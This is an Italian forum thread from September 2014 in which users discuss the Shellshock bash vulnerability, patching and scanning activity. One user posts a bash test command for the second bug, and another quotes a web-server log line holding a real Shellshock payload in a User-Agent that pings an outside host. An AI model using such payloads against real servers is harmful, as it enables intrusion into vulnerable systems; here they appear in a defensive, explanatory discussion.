Supporta il tuo Forum su Patreon!
 
  > Register  
  > Calendar  
  > Members List  
 
  > Supporta il Forum  
  > Today's Posts  
   

Go Back   netgamers.it > NetGamers Life > Agorà

Reply
 
Thread Tools Rating: Thread Rating: 16 votes, 4.88 average.
Old 25th September 2014, 13:03   #31
Bard
Aka -]NeMo[-
 
Bard's Avatar
 
Join Date: Nov 2000
Location: Magnagatti DOC
Posts: 29,147
Non capisco di che parlate ma mi state facendo paura

C'è un buco su Bash? Chi è che deve preoccuparsi?
__________________
_██_
.o_ರೃ INDEED.
Bard is offline   Reply With Quote
Old 25th September 2014, 13:05   #32
joyrex
triggering
 
joyrex's Avatar
 
Quote:
Originally Posted by Bard View Post
C'è un buco su Bash? Chi è che deve preoccuparsi?
Si deve preoccupare chiunque.

Gli utenti però possono solo incrociare le dita e sperare in un patching veloce.
E' inutile cambiare password o qualsiasi altra azione.


Comunque anche chi usa qualsiasi *nix come client (quindi linux, osx, *bsd, android, ios, router vari) deve patchare appena viene rilasciato il fix.

PS. come già detto hanno rilasciato un fix temporaneo ma non copre completamente la vulnerabilità
__________________
>>
We are the music makers, And we are the dreamers of dreams,
Wandering by lone sea-breakers, And sitting by desolate times;—
joyrex is offline   Reply With Quote
Old 25th September 2014, 13:08   #33
Ryoichi-Kun
Istigatore alla derisione
 
Ryoichi-Kun's Avatar
 
Join Date: Sep 2013
Location: Zendikar
Posts: 512
Alla faccia di quelli che dicevano che Heartbleed era pericoloso

Ma com'è che non è ancora venuta fuori in massa sta notizia?
Ho aggiornato ora Arch e di conseguenza bash ma metà falla è ancora scoperta

Last edited by Ryoichi-Kun; 25th September 2014 at 13:10.
Ryoichi-Kun is offline   Reply With Quote
Old 25th September 2014, 13:16   #34
joyrex
triggering
 
joyrex's Avatar
 
In other news, avere un qualsiasi nexus è improvvisamente diventato utile:

http://www.kali.org/kali-linux-nethunter/




Quote:
Originally Posted by Ryoichi-Kun View Post
Ma com'è che non è ancora venuta fuori in massa sta notizia?
Perché non è facile da spiegare alle pecore.
__________________
>>
We are the music makers, And we are the dreamers of dreams,
Wandering by lone sea-breakers, And sitting by desolate times;—
joyrex is offline   Reply With Quote
Old 25th September 2014, 13:20   #35
ksn
:3
 
ksn's Avatar
 
Join Date: Apr 2003
Location: ಠ_ಠ
Posts: 16,640
io ho aggiornato bash e mi sembra patchato anche il 2 test
Code:
env X='() { (a)=>\' bash -c "echo date"; cat echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
date
cat: echo: No such file or directory
sto a posto o cmq bisogna aspettare il fix vero?
__________________
- If you're playing poker and you're also drunk then by many conventional measures you're already a winner.
ksn is offline   Reply With Quote
Old 25th September 2014, 13:24   #36
mtt
BANNED
 
Join Date: Feb 2010
Location: London
Posts: 10,494
Quote:
Originally Posted by ksn View Post
io ho aggiornato bash e mi sembra patchato anche il 2 test
Code:
env X='() { (a)=>\' bash -c "echo date"; cat echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
date
cat: echo: No such file or directory
sto a posto o cmq bisogna aspettare il fix vero?
che OS hai?
mtt is offline   Reply With Quote
Old 25th September 2014, 13:29   #37
Larios
( ͡° ͜ʖ ͡°)
 
Larios's Avatar
 
Join Date: Dec 2008
Location: Jerusalem
Posts: 10,132
ma un link? fix per cosa?
__________________
Uplay: NGI-Larios
Larios is offline   Reply With Quote
Old 25th September 2014, 13:31   #38
joyrex
triggering
 
joyrex's Avatar
 
Quote:
Originally Posted by ksn View Post
io ho aggiornato bash e mi sembra patchato anche il 2 test
Code:
env X='() { (a)=>\' bash -c "echo date"; cat echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
date
cat: echo: No such file or directory
sto a posto o cmq bisogna aspettare il fix vero?
in teoria si, in pratica no, questa shitstorm durerà un bel po' imho




e io che volevo leggermi la nuova e aggiornata e bellissima guida al testing owasp: https://www.owasp.org/images/1/19/OTGv4.pdf



Quote:
Originally Posted by Larios View Post
ma un link? fix per cosa?
scorri il thread
__________________
>>
We are the music makers, And we are the dreamers of dreams,
Wandering by lone sea-breakers, And sitting by desolate times;—
joyrex is offline   Reply With Quote
Old 25th September 2014, 13:35   #39
Ryoichi-Kun
Istigatore alla derisione
 
Ryoichi-Kun's Avatar
 
Join Date: Sep 2013
Location: Zendikar
Posts: 512
https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23

Quote:
Just as a heads up: The second vulnerability seems also to work with zsh (zsh 4.3.10 (x86_64-redhat-linux-gnu) on CentOS 6.5 and zsh (zsh 4.3.9 (i386-apple-darwin10.0) on Mac.
Quote:
Just to let you know: The second vulnerability also work on zsh 5.0.2 (x86_64-apple-darwin13.0) on Mac.
Anche zsh

Last edited by Ryoichi-Kun; 25th September 2014 at 13:41.
Ryoichi-Kun is offline   Reply With Quote
Old 25th September 2014, 13:35   #40
FrancisDrakeZ
...
 
FrancisDrakeZ's Avatar
 
Join Date: Oct 2011
Location: in deep seas
Posts: 985
questo è gravissimo... una falla enorme altro che "heart bleed"...

signori chiudete i boccaporti, ai posti di combattimento...
__________________
---

Last edited by FrancisDrakeZ; 25th September 2014 at 13:37.
FrancisDrakeZ is offline   Reply With Quote
Old 25th September 2014, 13:39   #41
Nyarlathothep
pondering...
 
Nyarlathothep's Avatar
 
Join Date: Mar 2004
Location: Corte di Azathoth
Posts: 3,993
Io ho la zsh 5.0.6 come shell per il mio utente e NON sembra funzionare (ovviamente le bash sono vulnerabili).

Comunque sono spaventato dal fatto che sembrano girare già exploit remoti per webserver basati sul un user-agent o cookies etc. crafted per http ma si parla anche dello UserAgent ssh.
__________________
Unisciti a [email protected]
"All science is either physics or stamp collecting."
-- Ernest Rutherford


Last edited by Nyarlathothep; 25th September 2014 at 13:45.
Nyarlathothep is offline   Reply With Quote
Old 25th September 2014, 13:44   #42
Nyarlathothep
pondering...
 
Nyarlathothep's Avatar
 
Join Date: Mar 2004
Location: Corte di Azathoth
Posts: 3,993
Tanto per dire, questo è stato preso ora nei log del mio webserver.
Stanno sicuramente facendo scan e usano il ping per riportare alla base.


89.207.135.125 - - [25/Sep/2014:07:52:36 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
__________________
Unisciti a [email protected]
"All science is either physics or stamp collecting."
-- Ernest Rutherford

Nyarlathothep is offline   Reply With Quote
Old 25th September 2014, 13:44   #43
ozeta
zeta
 
ozeta's Avatar
 
Join Date: Dec 2005
Posts: 13,824
non ho ben capito una cosa. per modificare una variabile di ambiente in bash, non bisogna avere l'accesso alla shell o comunque al filesystem?
ozeta is offline   Reply With Quote
Old 25th September 2014, 13:51   #44
joyrex
triggering
 
joyrex's Avatar
 
Quote:
Originally Posted by Nyarlathothep View Post
Tanto per dire, questo è stato preso ora nei log del mio webserver.
Stanno sicuramente facendo scan e usano il ping per riportare alla base.


89.207.135.125 - - [25/Sep/2014:07:52:36 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
come dicevo prima è da stanotte che girano scanner

è bene implementare delle regole apposite per bloccare tutte le richieste
__________________
>>
We are the music makers, And we are the dreamers of dreams,
Wandering by lone sea-breakers, And sitting by desolate times;—
joyrex is offline   Reply With Quote
Old 25th September 2014, 13:52   #45
joyrex
triggering
 
joyrex's Avatar
 
Quote:
Originally Posted by ozeta View Post
non ho ben capito una cosa. per modificare una variabile di ambiente in bash, non bisogna avere l'accesso alla shell o comunque al filesystem?
se chiami uno script CGI dietro è la shell a eseguire e l'ambiente è ovviamente il sistema
__________________
>>
We are the music makers, And we are the dreamers of dreams,
Wandering by lone sea-breakers, And sitting by desolate times;—
joyrex is offline   Reply With Quote
Reply

Thread Tools
Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT +2. The time now is 11:03.



Copyright 2017-2024 by netgamers.it